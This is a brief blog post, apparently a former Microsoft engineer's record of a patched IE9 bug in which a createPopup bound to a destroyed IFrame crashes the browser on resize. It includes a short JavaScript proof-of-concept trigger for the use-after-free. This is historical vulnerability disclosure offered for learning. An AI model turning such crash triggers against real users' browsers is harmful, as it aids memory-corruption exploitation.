IE9 Crash: Resizing a createPopup Belonging to a Dead IFrame

By opening a modeless dialog from within an IFrame, saving a pointer back to the IFrame, and then reloading the main window (which destroyed the IFrame), the modeless dialog could create a createPopup() tied to a dead IFrame context. Manually resizing that popup caused a PROBABLY_EXPLOITABLE crash.

// Called from the modeless dialog after the main window reloads:
function openResizablePopUp() {
    var badPop = iFrame.self.createPopup();
    badPop.document.body.innerHTML = '<h1>Resize this window.</h1>';
    badPop.show(0, 0, 600, 200);
    // Now manually resize/move the popup to trigger the crash
}

The popup was created via iFrame.self.createPopup() — the self indirection was necessary for this specific code path to work. Once shown, the popup’s resize message handler tried to call back into the IFrame’s (now-freed) CDoc::OnWindowMessage, causing the access violation. WinDBG classified it as PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE9: Persistent createPopup Acts as a Keylogger Across Navigation] :: [IE9 EoP: Crashing the Browser by Resizing a Persistent createPopup] >